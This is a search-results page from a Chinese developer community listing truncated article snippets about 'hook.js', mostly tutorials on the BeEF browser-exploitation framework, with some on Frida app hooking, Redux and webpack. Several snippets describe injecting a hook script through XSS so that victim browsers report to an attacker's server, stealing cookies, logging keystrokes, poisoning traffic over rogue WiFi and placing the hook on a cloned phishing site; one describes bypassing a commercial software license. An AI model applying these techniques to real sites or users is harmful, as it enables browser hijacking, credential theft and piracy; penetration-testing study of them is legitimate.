hook.js - 腾讯云开发者社区 - 腾讯云

开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

记录一次有点儿不一样的XSS

evil.com的时候，目标页面就会访问到我自己的域名，如果访问的域名页面中包含了 beef 的 hook.js，那目标不就上线了嘛，nice 开整！...测试一下，beef 的 hook.js 能不能访问 ?...在 beef 的 hook.js 页面可以成功访问之后，就可以构造 URL 了，这时只要 URL 后传入一个包含 hook.js 的页面就可以上线了，这里以 beef 的 demo 页面/demos/basic.html

7462 0

BeEF 客户端攻击框架的秘密（一）

所谓的钩子文件，直白点说就是一个让受害者在不知情的情况下，每秒跟beef服务器通信的脚本文件，当beef向受害者的浏览器发出指令时，hook.js脚本程序会执行相应的指令。...Hook_file的脚本链接为：http://192.168.231.154:3000/hook.js ?...Details(浏览器信息)：当受害者执行hook.js脚本后，脚本会自动收集受害者的浏览器信息。...Logs（操作记录）：相当于一个鼠标和键盘的记录器，但是它的作用域只在执行了hook.js脚本的Web网页。

3.7K1 0

您找到你想要的搜索结果了吗？

是的

没有找到

基于Beef-XSS+Sunny-Ngrok进行内网安全测试

框架无疑是当今最强大的浏览器攻击框架，网络上也存在很多关于它的教程，但是大部分都是基于内网环境下的教学，这就使得攻击效果大打折扣，另外大部分XSS教程只是实现一个aler(1)便证明达到了效果，而Beef-XSS要保证完整效果就要加载hook.js...注意这里远程端口号要和本地端口号保持一致，正常情况下可以不用这么填，但是hook.js在发送请求的时候会在后面自动追加端口号，造成无法成功请求，所以我就干脆设置成一样的了。...接下来我们只要把hook.js脚本想办法加载到目标网站就可以实现对浏览器的攻击了，最起码get个cookie还是不成问题的。...实现基于beef的xss攻击一般来说我们要加载一个js文件只需加入下边一行代码就可以： hook.js

1.3K5 0

Kali Linux Web渗透测试手册(第二版) - 5.5 - 利用BeEF执行xss攻击

实战演练 BeEF需要目标浏览器调用hook.js文件，它能让浏览器挂钩到我们的BeEF服务器，另外我们将利用一个易受XSS攻击的应用程序，让目标用户调用它: 1....q=hook.js"> 2. 现在，在BeEF面板中，攻击者将看到一个浏览器上线: 3....在浏览器被hook.js文件挂钩之后，目标用户在被域中导航攻击时，攻击者最好要让会话变为持久性的。...这个hook.js文件与服务器通信，执行命令，并返回响应，以便攻击者可以看到;它不会在客户端浏览器中打印任何内容，因此受害者通常不会知道他的浏览器已经被劫持。

3.7K1 0

浏览器渗透之BeEF的高级烹饪方式

enabled（254个利用模块）接口控制面板：： running on network interface: 127.0.0.1 Hook URL: http://127.0.0.1:3000/hook.js...127.0.0.1:3000/ui/panel running on network interface: 192.168.1.106 Hook URL: http://192.168.1.106:3000/hook.js...=">hook.js"> 这时候BeEF控制台就会看到一个新的挂钩(僵尸)浏览器： ?

2.4K1 0

专注XSS跨站脚本漏洞利用工具

MariaDB [(none)]> quit Bye 创建数据库（将产生一个空页）：访问页面 http://server-ip/reset_database.php 修改javascript钩子文件 hook.js...vulnerable_param=hook.js"/> 然后，当受害者访问被挂钩的页面时，XSS利用工具服务器应该列出被挂钩的浏览器

3411 0

app逆向万能的md5加密hook破解入参方法(其他加密用通用方法原理差不多,小白推荐)

安卓开发调用md5加密时候都会调用到系统类java.security.MessageDigest 加密时候会会调用里面2个关键方法update以及digest 根据这个原理我们开始写代码吧二.代码 hook.js...: print("[*] {0}".format(message['payload'])) else: print(message) with open('hook.js

13.1K3 1

JS投毒的另一种尝试

这里我选择了BeEF框架进行配合，在流量中插入hook.js 5、既然BeEF可以配合MSF来攻击浏览器，那这里自然也少不了MSF的戏份 0×02 工具准备 EDUP 迷你USB无线网卡免驱动 (RTL8188CUS...修改asset/inject/extern.js，在function中增加： var commandModuleStr = 'hook.js...[CDATA[';document.write(commandModuleStr); http://172.16.6.37:3000/hook.js是BeEF的XSS脚本，理论上，这个脚本可以放在任何地方...2、hook.js对手机浏览器没有任何效果 3、MSF的漏洞库比较并没有想象中那么强大，想要一举拿下被投毒的电脑，没有几个0day估计是搞不定的 4、忽然对360清空浏览器缓存的功能感到很纠结…… 5、

2.6K10 1

微信小游戏入门实战《小猫钓鱼》

3.在assets中创建脚本Hook.js，并将脚本作为组建添加到节点Hook上 ?...添加的方法为，点击节点Hook，在属性检查器中，添加组件添加用户脚本组件Hook.js 4.在Hook.js脚本中添加如下代码，来让鱼钩动起来： start () { this.node.runAction

2.2K4 0

【漏洞复现】BeEF与CVE-2018-4878漏洞利用

//登录名和密码默认都是：beef 我们将hook.js页面插入到存储型XSS处： ?...使用burp发包：'">hook.js> ? 查看评论区留言： ?

1.2K2 0

React全家桶之Redux使用

本文将基于上一讲的水果购物车（Hook.js）继续开发。再次展示一段代码重构的过程。 ?...setTimeout(() => { dispatch({type:'init', payload: ["草莓", "香蕉"]}); }, 1000); }; }; 使用（hook.js...模块化（combineReducers）当前尽管hook.js已经非常好读，但是store还是一团糟。应该考虑把hook相关的逻辑（reducer）从是store中分离。...此处设置别名`fruit` combineReducers({ fruit: fruitReducer }), applyMiddleware(logger, thunk) ); 这时候，在组件Hook.js

1.7K2 0

frida调试报错

在使用命令frida -U -f 包名 -l hook.js时报如下错误： Failed to spawn: need Gadget to attach on jailed Android; its default

1.2K1 0

xss-工具-Beef-Xss安装以及使用

下的 user是账号、passwd是密码，直接修改保存即可启动Beef-Xss之后控制台会有一下信息 beef的xss代码格式： :3000/hook.js..."> 例子：比如我的KaliLinux的ip地址：192.168.56.129 hook.js"></script

4.8K2 0

android frida hook介绍

github.com/oleavr/frida-agent-example.git cd frida-agent-example npm install 接下来打开这个目录，就可以写js 代码了, 新建一个hook.js...$new('hooked')) } }) } setImmediate(main) 然后执行命令: frida -U -f com.tencent.mm -l hook.js

1.4K1 0

浅谈XSS&Beef

beef-xss/config.yaml中修改基础使用安装好之后在浏览器访问:ip:3000/ui/panel 默认用户名和密码都为beef 默认hook js：http://ip:3000/hook.js...默认hook页面： http://ip:3000/demos/basic.html 　　//访问即可被hook 往存在XSS漏洞的地方插入以下代码 hook.js...'>; 举个例子：往DVWA靶场插入xss代码 hook.js'>; 那么在beef...上可以看到被嵌入hook.js的浏览器已经上线了然后你可以选择各种攻击模块进行操作了每个模块前面的颜色代表着不同的意义实用攻击模块使用下面模块的前提是你使用hook.js'>;控制了浏览器。

7K2 0

某新闻App sign签名算法解析（一）

gScript.exports.callsignfun('6af6f31a-c608-4e01-97ad-2cf39cf17cf4','','1644299600595') return res 然后hook.js...这么写: // hook.js // 签名 function callSignFun(str1,str2,str3){ var result = 'null'; Java.perform(function

1.2K4 0

webpack + vuecli多页面打包基于（vue-template-admin）修改

:11:1) at SyncHook.lazyCompileHook (D:\EVDownload\adminMPA\node_modules\tapable\lib\Hook.js...anonymous>:6:1) at AsyncSeriesHook.lazyCompileHook (D:\EVDownload\adminMPA\node_modules\tapable\lib\Hook.js...anonymous>:6:1) at AsyncSeriesHook.lazyCompileHook (D:\EVDownload\adminMPA\node_modules\tapable\lib\Hook.js...anonymous>:15:1) at AsyncSeriesHook.lazyCompileHook (D:\EVDownload\adminMPA\node_modules\tapable\lib\Hook.js

4131 0

APP逆向案例---xxapp

: print("[*] {0}".format(message['payload'])) else: print(message) with open('hook.js...(message,data): print(message) script.on("message",show) # 加载脚本 script.load() sys.stdin.read() hook.js...return args } }); 可以运行python代码,可以直接控制台运行frida -U com.zuiai.hh -l C:\Users\xxx\Desktop\appHOOK\hook.js

1.1K2 0

网站克隆：setoolkit社工软件

将beef-xss生成的js代码，放入网站中 hook.js"> 被攻击目标打开网页链接，则beef

3.4K3 1

Java 应用安全之 JEB Floating License 绕过

Xverify:none -javaagent:HookAgent.jar=className=com.pnfsoftware.jebglobal.aW;methodName=jU;methodImplFile=hook.js...agent] premain enter, agentArgs=className=com.pnfsoftware.jebglobal.aW;methodName=jU;methodImplFile=hook.js...Parsing hook options from agentArgs: className=com.pnfsoftware.jebglobal.aW;methodName=jU;methodImplFile=hook.js...[agent] Reading methodImpl from hook.js [agent] Loaded com.pnfsoftware.jebglobal.aW->jU: { System.out.println

4411 0

点击加载更多

相关资讯

WooyunWifi高级组合技＆一套连击拿SHELL

热门标签

活动推荐

运营活动

活动名称

广告关闭